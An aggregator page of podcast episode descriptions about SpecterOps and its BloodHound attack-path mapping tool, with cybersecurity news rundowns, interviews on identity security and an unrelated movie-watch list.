Podcasts about specter ops

In this Risky Business sponsored interview, Tom Uren talks to Justin Kohler, Chief Product Officer at SpecterOps, about how attack paths exist in the seams between different identity or permissions management domains. In isolation, for example, both your Github and your AWS deployment could follow best practices. But bring them together and you've got problems. Bloodhound's OpenGraph lets you find and fix these otherwise invisible attack paths. Show notes

In this sponsored Soap Box edition of the Risky Business podcast, Patrick Gray chats with Jared Atkinson, CTO of SpecterOps, about BloodHound OpenGraph. OpenGraph enumerates attack paths across platforms and services, not just your primary directories. A compromised GitHub account to on-prem AD compromise attack path? It's a thing, and OpenGraph will find it. Cross-platform attack path enumeration! So good! This episode is also available on Youtube. Show notes

Brendan talks about the movies he watched in July and August of 2025. Join us, won't you?JULY 2025Trainwreck: Poop Cruise (2025)Perseverance: Castaway Chronicles – Episodes 1 & 2 (2022)Perseverance: Castaway Chronicles – Episodes 3 & 4 (2025)This Is Spinal Tap (1984)This Game Goes to Eleven (2018)Rock Hard: 1977 (2024)AUGUST 2025Most Dangerous Game (2020)Specter Ops (2015)Beast (2023)The Wicker Man (1973)“The Festival” by H.P. LovecraftArkham Horror: The Card Game – The Feast of Hemlock Vale: Campaign Expansion (2024)Deep Cover (2025)FiascoKPop Demon Hunters (2025)Free Radicals (2022)Dante's Peak (1997)The Downfall of Pompeii (2004)Have you seen these films? What do you think of them? What did you watch in July and August? Share your thoughts over on boardgamegeek in guild #3269.

Brendan talks about the movies he watched in July and August of 2025. Join us, won't you?JULY 2025Trainwreck: Poop Cruise (2025)Perseverance: Castaway Chronicles – Episodes 1 & 2 (2022)Perseverance: Castaway Chronicles – Episodes 3 & 4 (2025)This Is Spinal Tap (1984)This Game Goes to Eleven (2018)Rock Hard: 1977 (2024)AUGUST 2025Most Dangerous Game (2020)Specter Ops (2015)Beast (2023)The Wicker Man (1973)“The Festival” by H.P. LovecraftArkham Horror: The Card Game – The Feast of Hemlock Vale: Campaign Expansion (2024)Deep Cover (2025)FiascoKPop Demon Hunters (2025)Free Radicals (2022)Dante's Peak (1997)The Downfall of Pompeii (2004)Have you seen these films? What do you think of them? What did you watch in July and August? Share your thoughts over on boardgamegeek in guild #3269.

Parce que… c'est l'épisode 0x640! Shameless plug 12 au 17 octobre 2025 - Objective by the sea v8 14 et 15 octobre 2025 - ATT&CKcon 6.0 14 et 15 octobre 2025 - Forum inCyber Canada Code rabais de 30% - CA25KDUX92 4 et 5 novembre 2025 - FAIRCON 2025 8 et 9 novembre 2025 - DEATHcon 17 au 20 novembre 2025 - European Cyber Week 25 et 26 février 2026 - SéQCure 2026 Description Introduction et parcours professionnel Mathieu Saulnier, connu sous le pseudonyme “Scooby” dans la communauté de cybersécurité, possède une vingtaine d'années d'expérience dans le domaine. Son parcours l'a mené d'un grand fournisseur internet et de télécommunications vers la gestion d'un SOC (Security Operations Center), puis vers des rôles de recherche sur les menaces pour des vendeurs de SIEM et d'EDR. Aujourd'hui, il occupe le poste de product manager pour BloodHound Community Edition chez SpecterOps, une position qu'il a obtenue grâce à ses nombreuses présentations sur BloodHound au fil des années. BloodHound version 8 et la révolution OpenGraph La version 8 de BloodHound représente une évolution majeure de l'outil. La fonctionnalité phare est OpenGraph, qui permet d'ingérer n'importe quel type de données dans le graphe et de créer ses propres chemins d'attaque pour différentes technologies. Historiquement, BloodHound se concentrait exclusivement sur Active Directory et Azure/Entra ID, mais cette limitation appartient désormais au passé. Avec le lancement d'OpenGraph, SpecterOps a publié plusieurs nouveaux collecteurs pour diverses technologies : One Password, Snowflake, et Jamf (pour la gestion des postes de travail Mac). La communauté a réagi avec enthousiasme, puisqu'en seulement 48 heures après l'annonce, un contributeur externe a créé un collecteur pour Ansible. Plus récemment, un collecteur pour VMware vCenter et ESXi a également vu le jour, démontrant l'adoption rapide de cette nouvelle capacité. La distinction fondamentale : access path versus attack path Mathieu utilise une analogie éclairante avec Google Maps pour expliquer la différence entre un chemin d'accès et un chemin d'attaque. Google Maps montre les chemins autorisés selon différents modes de transport (voiture, vélo, transport en commun), chacun ayant ses propres règles et restrictions. C'est l'équivalent d'un graphe d'accès qui indique où on a le droit d'aller. Un chemin d'attaque, en revanche, représente la perspective d'un adversaire qui ne se préoccupe pas des règlements. L'exemple donné est celui d'une voiture roulant sur une piste cyclable à Montréal : c'est interdit, on sait qu'on risque une contravention, mais c'est techniquement possible. Dans le monde numérique, les conséquences sont souvent moins immédiates et moins visibles, ce qui explique pourquoi les attaquants exploitent régulièrement ces chemins non conventionnels. L'évolution du modèle de données BloodHound a commencé modestement avec seulement trois types d'objets (utilisateurs, groupes et ordinateurs) et trois types de relations (member of, admin et session). Depuis, le modèle s'est considérablement enrichi grâce aux recherches menées par SpecterOps et d'autres organisations. Des propriétés comme le Kerberoasting ont été ajoutées, permettant d'identifier les objets vulnérables à ce type d'attaque et d'élever ses privilèges. La vraie puissance d'OpenGraph réside dans la capacité de relier différents systèmes entre eux. Par exemple, si un attaquant compromet le poste d'un utilisateur ayant accès à un dépôt GitHub, il peut voler les tokens et sessions pour effectuer des commits au nom de cet utilisateur, potentiellement dans une bibliothèque largement utilisée, ouvrant ainsi la voie à une attaque de la chaîne d'approvisionnement (supply chain attack). Cette interconnexion multi-dimensionnelle des systèmes était difficile à visualiser mentalement, mais le graphe la rend évidente. Créer des collecteurs OpenGraph : exigences et bonnes pratiques Pour qu'un collecteur soit accepté dans la liste officielle des projets communautaires, certains standards doivent être respectés. Il faut créer le connecteur avec une documentation détaillant les permissions minimales nécessaires (principe du moindre privilège), expliquer son fonctionnement, les systèmes d'exploitation supportés, et les dépendances requises. La documentation devrait également inclure des références sur comment exploiter ou défendre contre les vulnérabilités identifiées. Bien que non obligatoires, des éléments visuels personnalisés (icônes et couleurs) sont fortement recommandés pour assurer une cohérence visuelle dans la communauté. Le projet étant open source, les utilisateurs peuvent toujours modifier ces éléments selon leurs préférences. Un aspect crucial est la fourniture de requêtes Cypher pré-construites. Sans ces requêtes, un utilisateur qui ne connaît pas Cypher pourrait importer toutes les données mais se retrouver bloqué pour les exploiter efficacement. Le langage Cypher et l'accès aux données BloodHound fonctionne sur une base de données graphique, historiquement Neo4j, mais maintenant également PostgreSQL grâce à un module de conversion. Le langage de requête utilisé est Cypher, qui possède une syntaxe particulière. Pour rendre l'outil plus accessible, SpecterOps maintient une bibliothèque Cypher contenant de nombreuses requêtes créées par l'équipe et la communauté. Ces requêtes peuvent être exécutées directement depuis le portail BloodHound. L'entreprise explore également l'utilisation de LLM (Large Language Models) pour générer des requêtes Cypher automatiquement, bien que le corpus public de données spécifiques à BloodHound soit encore limité. Les pistes futures incluent l'utilisation de MCP (Model Context Protocol) et d'approches agentiques pour améliorer la génération de requêtes. Usage défensif et offensif : deux faces d'une même médaille Mathieu souligne que les mêmes requêtes Cypher peuvent servir tant aux équipes bleues (défensives) qu'aux équipes rouges (offensives). La différence réside dans l'intention et l'utilisation des résultats, pas dans les outils eux-mêmes. C'est l'équivalent du marteau qui peut construire ou détruire selon l'utilisateur. Pour l'usage défensif, BloodHound Enterprise offre des fonctionnalités avancées comme le scan quasi-continu, l'identification automatique des points de contrôle critiques (choke points), et des outils de remédiation. Même la version communautaire gratuite permet de découvrir des vulnérabilités majeures lors de la première exécution. Exemples concrets et cas d'usage Mathieu partage des exemples frappants de découvertes faites avec BloodHound. Dans une entreprise de plus de 60 000 employés, il a identifié un serveur où tous les utilisateurs du domaine (domain users) avaient été accidentellement configurés comme administrateurs locaux. Comme un compte administrateur de domaine se connectait régulièrement à ce serveur, n'importe quel utilisateur pouvait devenir administrateur du domaine en seulement trois étapes : RDP vers le serveur, dump de la mémoire pour récupérer le token, puis attaque pass-the-hash. Un autre cas récent impliquait le script de login d'un administrateur de domaine stocké dans un répertoire accessible en écriture à tous. En y plaçant un simple script affichant un popup, l'équipe de sécurité a rapidement reçu une notification prouvant la vulnérabilité. Nouvelles fonctionnalités : la vue tableau Bien que moins spectaculaire qu'OpenGraph, la fonctionnalité “table view” répond à un besoin important. La célèbre citation de John Lambert de Microsoft (2015) dit : “Les attaquants pensent en graphe, les défenseurs pensent en liste. Tant que ce sera vrai, les attaquants gagneront.” Bien que la visualisation graphique soit le paradigme central de BloodHound, certaines analyses nécessitent une vue tabulaire. Par exemple, une requête identifiant tous les comptes Kerberoastables retourne de nombreux points à l'écran, mais sans informations détaillées sur les privilèges ou l'appartenance aux groupes. La vue tableau permet de choisir les colonnes à afficher et d'exporter les données en JSON (et bientôt en CSV), facilitant l'analyse et le partage d'informations. Deathcon Montréal : la conférence pour les défenseurs En complément à son travail sur BloodHound, Mathieu est le site leader de Montréal pour Deathcon (Detection Engineering and Threat Hunting Conference). Cette conférence unique, entièrement axée sur les ateliers pratiques (hands-on), se déroule sur deux jours en novembre. Contrairement aux conférences traditionnelles, tous les ateliers sont pré-enregistrés, permettant aux participants de travailler à leur rythme. L'événement se limite volontairement à 50 personnes maximum pour maintenir une atmosphère humaine et favoriser les interactions. Les participants ont accès à un laboratoire massif incluant Splunk, Elastic, Sentinel et Security Onion, et conservent cet accès pendant au moins un mois après l'événement. Sans sponsors, la conférence est entièrement financée par les billets, et l'édition 2024 a déjà vendu plus de 30 places, avec de nombreux participants de l'année précédente qui reviennent. Conclusion BloodHound avec OpenGraph représente une évolution majeure dans la visualisation et l'analyse des chemins d'attaque en cybersécurité. En permettant l'intégration de multiples technologies au-delà d'Active Directory, l'outil offre désormais une vision holistique des vulnérabilités organisationnelles. Que ce soit pour la défense ou les tests d'intrusion, BloodHound continue de démontrer que penser en graphe plutôt qu'en liste constitue un avantage stratégique décisif en matière de sécurité. Collaborateurs Nicolas-Loïc Fortin Mathieu Saulnier Crédits Montage par Intrasecure inc Locaux réels par Bsides Montréal

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Jared Atkinson, CTO at SpecterOps. They discuss how SpecterOps is using classifying identities under two categories, identities at rest and identities in transit, what they are and how they should be treated differently. Show notes Shifting the Paradigm: Managing Identities at Rest vs. Identities in Transit BloodHound OpenGraph

Maxime Lamothe-Brassard, Founder and CEO of LimaCharlie, and the Defender Fridays community sit down with Jared Atkinson and dive into BloodHound.Jared is a security researcher who specializes in Digital Forensics and Incident Response. Recently, he has been building and leading private sector Hunt Operations capabilities. In his previous life, Jared lead incident response missions for the U.S. Air Force Hunt Team, detecting and removing Advanced Persistent Threats on Air Force and DoD networks. Passionate about PowerShell and the open source community, Jared is the lead developer of PowerForensics, Uproot, and maintains a DFIR focused blog at www.invoke-ir.com.On Defender Fridays we delve into the dynamic world of information security, exploring its defensive side with seasoned professionals from across the industry. Our aim is simple yet ambitious: to foster a collaborative space where ideas flow freely, experiences are shared, and knowledge expands.Join the live discussions by registering at https://limacharlie.io/defender-fridays

On this week's show Patrick Gray and Adam Boileau discuss the week's cybersecurity news, including: CISA warns about the path from on-prem Exchange to the cloud Microsoft awards a crisp zero dollar bill for a report about what a mess its internal Entra-authed apps are Everyone and their dog seems to have a shell in US Federal Court information systems Google pays $250k for a Chrome sandbox escape Attackers use javascript in adult SVG files to … farm facebook likes?! SonicWall says users aren't getting hacked with an 0day… this time. This week's episode is sponsored by SpecterOps. Chief product officer Justin Kohler talks about how the flagship Bloodhound tool has evolved to map attack paths anywhere. Bring your own applications, directories and systems into the graph, and join the identity attacks together. This episode is also available on Youtube. Show notes CISA, Microsoft issue alerts on ‘high-severity' Exchange vulnerability | The Record from Recorded Future News Advanced Active Directory to Entra ID lateral movement techniques Consent & Compromise: Abusing Entra OAuth for Fun and Access to Internal Microsoft Applications Cartels may be able to target witnesses after major court hack Federal judiciary tightens digital security as it deals with ‘escalated cyberattacks' | The Record from Recorded Future News Citrix NetScaler flaws lead to critical infrastructure breaches | Cybersecurity Dive DARPA touts value of AI-powered vulnerability detection as it announces competition winners | Cybersecurity Dive Buttercup is now open-source! HTTP/1.1 must die: the desync endgame US confirms takedown of BlackSuit ransomware gang that racked up $370 million in ransoms | The Record from Recorded Future News North Korean cyber-espionage group ScarCruft adds ransomware in recent attack | The Record from Recorded Future News Adult sites are stashing exploit code inside racy .svg files - Ars Technica Google pays 250k for Chromium sandbox escape SonicWall says recent attack wave involved previously disclosed flaw, not zero-day | Cybersecurity Dive Two groups exploit WinRAR flaws in separate cyber-espionage campaigns | The Record from Recorded Future News Tornado Cash cofounder dodges money laundering conviction, found guilty of lesser charge | The Record from Recorded Future News Hackers Hijacked Google's Gemini AI With a Poisoned Calendar Invite to Take Over a Smart Home | WIRED Malware in Open VSX: These Vibes Are Off How attackers are using Active Directory Federation Services to phish with legit office.com links Introducing our guide to phishing detection evasion techniques The State of Attack Path Management

In this episode, host Rob Wermuth is joined by Jason Frank, Chief Operating Officer at SpecterOps, to explore one of the most critical issues facing businesses today: cybersecurity. With a background in penetration testing, threat hunting, and enterprise security operations, Jason shares insights from years on the front lines of digital defense. They discuss the rise of ransomware, the impact of artificial intelligence on risk, and how zero trust models are reshaping security in a remote-first world. Jason breaks down complex topics into practical steps that business owners, especially those leading small to mid-sized companies, can act on today. From strengthening password protocols to implementing multi-factor authentication and managing identity risk, Jason offers clear, actionable advice. He also explains how tools like BloodHound can reveal vulnerabilities that often go unnoticed. Looking ahead, the conversation touches on balancing innovation with privacy, preparing the next generation of cybersecurity talent, and why an annually reviewed cyber action plan is essential to long-term business value. If you are thinking about how to better protect your organization, clients, and legacy in an increasingly digital world, this episode is filled with timely and practical guidance. ​​______________​​______________​​ Legacy Planning- 3440 Hamilton Blvd Allentown, PA 18103 and 228 W Gay Street West Chester, PA 19380  610-719-8600 www.legacy-online.com Legacy Planning offers securities and advisory services through Commonwealth Financial Network®, Member FINRA/SIPC, a Registered Investment Adviser. Legacy Planning is owned by HUB International. HUB and Commonwealth are separate and unrelated entities.  

In this Risky Bulletin sponsor interview Justin Kohler, Chief Product Officer at SpecterOps talks to Tom Uren about the impossible challenge of managing identity directory services securely. Organisations try to implement the principle of least privilege but have no idea if they have done a good job. Justin talks about approaches SpecterOps is developing to address this problem. Show notes

On this week's show Patrick Gray and Adam Boileau discuss the week's cybersecurity news with special guest Rob Joyce, a Former Special Assistant to the US President and Director of Cybersecurity for NSA. They talk through: A realistic bluetooth-proximity phishing attack against Passkeys A very patient ransomware actor encrypts an entire enterprise with a puny linux webcam processor The ESP32 backdoor that is neither a door nor at the back The X DDoS that Elon said was Ukraine is claimed by pro-Palestinian hacktivists Years later, LastPass hackers are still emptying crypto-wallets …and it turns out North Korea nailed {Safe}Wallet with a malicious docker image. Nice! Rob Joyce recently testified to the US House Select Committee on the Chinese Communist Party, and he explains why DOGE kicking probationary employees to the curb is “devastating” for the national security staff pipeline. This week's episode is sponsored by SpecterOps, makers of the Bloodhound identity attack path mapping tool. Chief Product Officer Justin Kohler and Principal Security Researcher Lee Chagolla-Christensen discuss their pragmatic approach to disabling NTLM authentication in Active Directory using Bloodhound's insight. This episode is also available on Youtube. Show notes CVE-2024-9956 - PassKey Account Takeover in All Mobile Browsers | Tobia Righi - Security Researcher Feds Link $150M Cyberheist to 2022 LastPass Hacks – Krebs on Security Camera off: Akira deploys ransomware via webcam Tarlogic detects a hidden feature in the mass-market ESP32 chip that could infect millions of IoT devices Alleged Co-Founder of Garantex Arrested in India – Krebs on Security 37K+ VMware ESXi instances vulnerable to critical zero-day | Cybersecurity Dive Apple patches 0-day exploited in “extremely sophisticated attack” - Ars Technica What Really Happened With the DDoS Attacks That Took Down X | WIRED Eleven11bot estimates revised downward as researchers point to Mirai variant | Cybersecurity Dive Previously unidentified botnet infects unpatched TP-Link Archer home routers | The Record from Recorded Future News Safe.eth on X: "Investigation Updates and Community Call to Action" / X How to verify Safe{Wallet} transactions on a hardware wallet | Safe{Wallet} Help Center and Support. US charges Chinese nationals in cyberattacks on Treasury, dissidents and more | The Record from Recorded Future News Former top NSA cyber official: Probationary firings ‘devastating' to cyber, national security | CyberScoop U.S. pauses intelligence sharing with Ukraine used to target Russian forces - The Washington Post

On this week's show, Patrick Gray and Adam Boileau discuss the week's cybersecurity news, including: The SEC's cyber incident reporting isn't very exciting after all China Telecom on the way to being thrown out of the US The NSA/Cybercom might get two separate hats The Cl0p ransomware crew are back and taking responsibility for the Cleo hacks (Yet another) File upload bug in Struts makes Java admins weep And much, much more. This episode is sponsored by SpecterOps, who run a pretty top notch offsec/pentest team when they're not busy making the Bloodhound Enterprise identity attack path enumeration software. SpecterOps' Robby Winchester joins to talk about how pentest has changed, and how their customers get value from their testing. This episode is also available Youtube. Show notes SEC cyber incident reporting rule generates 71 filings in 11 months | Cybersecurity Dive US senators, green groups call for accountability over hacking of Exxon critics | Reuters Biden Administration Takes First Step to Retaliate Against China Over Hack - The New York Times Unfinished business for Trump: Ending the Cyber Command and NSA 'dual hat' | The Record from Recorded Future News EU opens investigation into TikTok and the Romanian election – POLITICO Clop ransomware claims responsibility for Cleo data theft attacks CISA warns of ransomware gangs exploiting Cleo, CyberPanel bugs | The Record from Recorded Future News CVE-2024-55956 | AttackerKB Apache issues patches for critical Struts 2 RCE bug • The Register Japanese game and anime publisher reportedly pays $3 million ransom to Russia-linked hackers | The Record from Recorded Future News Israeli spyware firm Paragon acquired by US investment group, report says | Reuters How Cryptocurrency Turns to Cash in Russian Banks – Krebs on Security Arizona man arrested for alleged involvement in violent online terror networks | CyberScoop Russia bans Viber, claiming app facilitates terrorism and drug trafficking | The Record from Recorded Future News

It's been a tough few months for many local IT departments. Last week, hackers posted a handful of files stolen from SeaTac airport on the dark web. A ransomware gang is attempting to sell a trove of stolen Port of Seattle data for 6 million dollars in Bitcoin – after the Port refused to pay up. The cyber-attack a little over a month ago snarled travel when it took down ticketing, baggage, and other SeaTac services. But that's just the highest profile ransomware case in the Seattle area in recent months. A few weeks ago, the Highline School District canceled classes because a cyberattack had wormed its way into the local system. There was also a crippling ransomware attack on Seattle Public Libraries back in May, which put their book checkout and online systems in limbo for months For more on what's happening – and how organizations can protect themselves –Soundside caught up with Robby Winchester, the vice president of services and a co-founder of SpecterOps, a Seattle cybersecurity company.  Thank you to the supporters of KUOW, you help make this show possible! If you want to help out, go to kuow.org/donate/soundsidenotes Soundside is a production of KUOW in Seattle, a proud member of the NPR Network. Guests: Robby Winchester on the line. He's the vice president of services and a co-founder of SpecterOps, a Seattle cybersecurity company.  Related Links:  Hackers demand $6 million for files stolen from Seattle airport operator in cyberattack | AP News Highline schools closing Monday because of cyberattack | The Seattle Times Why did ransomware hackers target Seattle Public Library? – GeekWire See omnystudio.com/listener for privacy information.

In episode 101 of Cybersecurity Where You Are, Sean Atkinson is joined by Justin Kohler, Vice President of Products at SpecterOps, and Jonathan Parfait, Technical Account Manager at SpecterOps.Together, they discuss how the visualization of attack paths in Active Directory helps organizations to better contextualize risks to their enterprise security.Here are some highlights from our episode:01:54. What Bloodhound is and how it assists organizations in assessing risks in their Active Directory environments05:08. Why have organizations look at their Active Directory environments11:15. Common vulnerabilities and misconfigurations identified by Bloodhound21:21. How organizations can best use Bloodhound as part of their cyber defensive strategy29:18. How Bloodhound is adapting to keep up with evolving Active Directory environmentsResourcesBloodhound Community EditionEpisode 62: Inside the 'Spidey Sense' of a PentesterWhat You Need to Know About Hybrid Cloud EnvironmentsVulnerability Management Policy Template for CIS Control 7CIS Benchmarks ListIf you have some feedback or an idea for an upcoming episode of Cybersecurity Where You Are, let us know by emailing podcast@cisecurity.org.

On this week's show, Patrick Gray and Adam Boileau discuss the week's security news including: Microsoft did a good thing! Soon all Azure admins will require MFA The three billion row National Public Data breach mess, courtesy Florida Man US govt confirms that it was Iran that hacked the Trump campaign Is TP-Link the next Huawei, or just not very good at computers? Major Chinese RFID card maker has hardcoded backdoors And much, much more. This week's episode is sponsored by Specter Ops, makers of Bloodhound Enterprise. VP of Products Justin Kohler joins to talk about how they've joined their on-prem AD and cloud Entra attack path graphs, so you can map out that juicy, real-world attack surface. Show notes Announcing mandatory multi-factor authentication for Azure sign-in | Microsoft Azure Blog phishing resistant mfa - Google Search Microsoft will require MFA for all Azure users NationalPublicData.com Hack Exposes a Nation's Data – Krebs on Security National Public Data Published Its Own Passwords – Krebs on Security Bloomberg Law How the government's proposed 'Trust Exchange' digital ID scheme would work - ABC News German Cyber Agency Wants Changes in Microsoft, CrowdStrike Products After Tech Outage - WSJ Joint ODNI, FBI, and CISA Statement on Iranian Election Influence Efforts — FBI Crypto firm says hacker locked all employees out of Google products for four days ZachXBT on X: "Seven hours ago a suspicious transfer was made from a potential victim for 4064 BTC ($238M)" / X Bitcoin News Today: $238 Million Bitcoin Heist Linked to Genesis Global Trading Routers from China-based TP-Link a national security threat, US lawmakers claim Hardware backdoors found in Chinese smart cards Unmasking Styx Stealer: How a Hacker's Slip Led to an Intelligence Treasure Trove - Check Point Research Hardware backdoors found in Chinese smart cards Man who hacked Hawaii state registry to forge his own death certificate sentenced to 81 months

Guest: Zack Allen, Senior Director of Detection & Research @ Datadog, creator of Detection Engineering Weekly Topics: What are the biggest challenges facing detection engineers today? What do you tell people who want to consume detections and not engineer them? What advice would you give to someone who is interested in becoming a detection engineer at her organization? So, what IS a detection engineer? Do you need software skills to be one? How much breadth and depth do you need? What should a SOC leader whose team totally lacks such skills do? You created Detection Engineering Weekly. What motivated you to start this publication, and what are your goals for it? What are the learnings so far? You work for a vendor, so how should customers think of vendor-made vs customer-made detections and their balance?  What goes into a backlog for detections and how do you inform it? Resources: Video (LinkedIn, YouTube) Zacks's newsletter: https://detectionengineering.net  EP75 How We Scale Detection and Response at Google: Automation, Metrics, Toil EP117 Can a Small Team Adopt an Engineering-Centric Approach to Cybersecurity? The SRE book “Detection Spectrum” blog “Delivering Security at Scale: From Artisanal to Industrial” blog (and this too) “Detection Engineering is Painful — and It Shouldn't Be (Part 1)” blog series “Detection as Code? No, Detection as COOKING!” blog “Practical Threat Detection Engineering: A hands-on guide to planning, developing, and validating detection capabilities” book SpecterOps blog  

In this Risky Business News sponsored interview, Tom Uren talks to Justin Kohler, VP of the Bloodhound team at SpecterOps about ‘attack paths', the ways that malicious actors maneuver through Active Directory to elevate their privileges. They discuss how and why they arise and what you can do about them.

The need to properly secure Entra ID tenants has been made pretty obvious this year thanks to a large-scale attack on them by Russia's SVR intelligence agency. In this interview Andy Robbins from SpecterOps, the maker of Bloodhound Enterprise, talks through how he thinks those attacks actually went down, about how if you're an o365 customer you're using Entra ID whether you like it or not, and about how you can lock down your Entra ID tenant.

The need to properly secure Entra ID tenants has been made pretty obvious this year thanks to a large-scale attack on them by Russia's SVR intelligence agency. In this interview Andy Robbins from SpecterOps, the maker of Bloodhound Enterprise, talks through how he thinks those attacks actually went down, about how if you're an o365 customer you're using Entra ID whether you like it or not, and about how you can lock down your Entra ID tenant.

In Season 5, Episode 19 of the BSM podcast, host Steven Bowcut welcomes Jared Atkinson, the Chief Strategist at SpecterOps and the host of the "Detection Challenging Paradigms Podcast." The episode focuses on the dynamic and increasingly important topic of purple teaming within cybersecurity. Key Points Discussed - Evolution of Purple Teaming: Jared delves into the progression of purple teaming practices and their significance in the current threat landscape. He emphasizes how both defensive (blue team) and offensive (red team) strategies have melded to form a more comprehensive security approach. - Testing Landscape and Vendor Claims: The conversation touches on how the testing landscape has evolved, particularly considering vendor claims about the capabilities of their security solutions. Jared scrutinizes these claims and suggests a more measured approach to evaluating their efficacy. - Shortcomings in Purple Team Assessments: Jared enumerates the reasons why many purple team assessments don't reach their full potential. These shortcomings often stem from a lack of realistic testing scenarios or comprehensive coverage of possible attack vectors. - Role of New Frameworks: The introduction of new frameworks like Atomic Testing is highlighted as a game-changer in the field. Jared talks about how these frameworks can improve the precision and effectiveness of security assessments. - Building and Selecting Test Cases: The importance of building and selecting diverse and relevant test cases is discussed. Jared underlines the necessity for organizations to cover a wide range of attack techniques in their testing protocols. - Evolution of Attack Techniques: Examples of how attack techniques have evolved over time are provided, offering listeners insights into the adaptive nature of cyber threats. - Analyzing Malware Samples: Jared points to SpecterOps's 10-part blog series that offers a deep dive into the technical aspects of malware sample analysis, an essential skill for modern threat hunters. - Future of Purple Teaming: Finally, Jared presents his perspective on the direction purple teaming should take in the future. He stresses the need for continual adaptation and the adoption of forward-thinking strategies to stay ahead of threat actors. Conclusion The episode is informative for cybersecurity professionals looking to understand the current state and the progression of purple teaming. Jared Atkinson's expertise provides listeners with a detailed examination of the challenges and considerations essential to advancing the effectiveness of cybersecurity defenses through collaborative and realistic testing. The discussion not only sheds light on current practices but also charts a course for the future of purple teaming, making it a must-listen for those engaged in or interested in the strategic aspects of cybersecurity.

On this show this week we're talking about Microsoft unbundling Microsoft Teams in response to Slack: Good or bad and how will it affect you? New features coming to Teams that are long awaited, plus Justin Kohler from SpecterOps joins us on the show to talk about his TEC conference session & give us a plethora of AD-related cybersecurity advice. Hey Practical 365 Podcast Listeners, we need your feedback! Tell us what you would like to hear about in our upcoming episodes by filling out this 1-minute survey.  Want to stay up to date on all things Practical 365? Follow us on Twitter, Facebook, and Linkedin to stay up to date on all things Microsoft!

Today's soap box is an absolute cracker. We're talking to Andy Robbins, the principal product architect at SpecterOps and one of the three original creators of the original open source version of Bloodhound. If you don't know what Bloodhound is, it's a tool that grabs Active Directory information and turns it into a navigable graph. So if you're an attacker you land on a network, enumerate directory information, and then map out a path to domain admin. Bloodhound has been extremely popular with red teamers for years – to the point that it's just a standard tool in the red team toolkit. But the team behind Bloodhound is now turning their attention to making Bloodhound a defensive tool as well as an offensive tool.

Today's soap box is an absolute cracker. We're talking to Andy Robbins, the principal product architect at SpecterOps and one of the three original creators of the original open source version of Bloodhound. If you don't know what Bloodhound is, it's a tool that grabs Active Directory information and turns it into a navigable graph. So if you're an attacker you land on a network, enumerate directory information, and then map out a path to domain admin. Bloodhound has been extremely popular with red teamers for years – to the point that it's just a standard tool in the red team toolkit. But the team behind Bloodhound is now turning their attention to making Bloodhound a defensive tool as well as an offensive tool.

GuestJustin KohlerVice President of Products at SpecterOps [@SpecterOps]On LinkedIn | https://www.linkedin.com/in/justin-kohler-49467110/On Twitter | https://twitter.com/JustinKohler10HostPhillip WylieOn ITSPmagazine  

GuestJustin KohlerVice President of Products at SpecterOps [@SpecterOps]On LinkedIn | https://www.linkedin.com/in/justin-kohler-49467110/On Twitter | https://twitter.com/JustinKohler10HostPhillip WylieOn ITSPmagazine  

GuestStephen HinckSystem Engineering Manager at SpecterOps [@SpecterOps]On LinkedIn | https://www.linkedin.com/in/shinck/On Twitter | https://twitter.com/StephenHinckHostPhillip WylieOn ITSPmagazine  

GuestStephen HinckSystem Engineering Manager at SpecterOps [@SpecterOps]On LinkedIn | https://www.linkedin.com/in/shinck/On Twitter | https://twitter.com/StephenHinckHostPhillip WylieOn ITSPmagazine  

CyberFront Z's failed influence operation. Iranian operators target Albanian government networks. CISA issues two ICS security advisories. Andy Robbins of SpecterOps to discuss Attack Paths in Azure. Denis O'Shea of Mobile Mentor talking on the intersection of endpoint security and employee experience. CISA and ACSC issue a joint advisory on top malware strains. or links to all of today's stories check out our CyberWire daily news briefing: https://thecyberwire.com/newsletters/daily-briefing/11/150 Selected reading. Quarterly Adversarial Threat Report (Meta) Meta took down Russian troll farm that supported country's invasion of Ukraine (The Hill) Russia's Infamous Troll Farm Is Back -- and Sh*tting the Bed (Rolling Stone)  Meta's threat report highlights clumsy attempt to manipulate Ukraine discourse (TechCrunch)  Likely Iranian Threat Actor Conducts Politically Motivated Disruptive Activity Against Albanian Government Organizations (Mandiant)  CISA Alert AA22-216A – 2021 top malware strains. (The CyberWire) 2021 Top Malware Strains (CISA) Digi ConnectPort X2D (CISA) Cisco Releases Security Updates for RV Series Routers (CISA)

This week, in our first segment we are joined by Andy Robbins, the Product Architect of BloodHound Enterprise at SpecterOps! Andy will explain the origin story of BloodHound, as well as where the project is today and where it's going in the future! Then, in the Security News for this week: Raspberry Pi Pico W Adds Wireless, Apple expands commitment to protect users from mercenary spyware, UK health authorities slammed for WhatsApp use in pandemic, Three UEFI Firmware flaws found in tens of Lenovo Notebook models, & a Hack Allows Drone Takeover Via ‘ExpressLRS' Protocol!   Segment Resources: https://github.com/BloodHoundAD/BloodHound https://medium.com/p/82667d17187a   Visit https://www.securityweekly.com/psw for all the latest episodes!   Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly   Show Notes: https://securityweekly.com/psw747

This week, in our first segment we are joined by Andy Robbins, the Product Architect of BloodHound Enterprise at SpecterOps! Andy will explain the origin story of BloodHound, as well as where the project is today and where it's going in the future! Then, in the Security News for this week: Raspberry Pi Pico W Adds Wireless, Apple expands commitment to protect users from mercenary spyware, UK health authorities slammed for WhatsApp use in pandemic, Three UEFI Firmware flaws found in tens of Lenovo Notebook models, & a Hack Allows Drone Takeover Via ‘ExpressLRS' Protocol!   Segment Resources: https://github.com/BloodHoundAD/BloodHound https://medium.com/p/82667d17187a   Visit https://www.securityweekly.com/psw for all the latest episodes!   Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www.facebook.com/secweekly   Show Notes: https://securityweekly.com/psw747

In Episode 9, Robby Winchester of SpecterOps stops by to talk on Jared's favorite topic - Detectionomics (trademark pending). This was our second in-person episode and was a blast to make, we hope you enjoy!

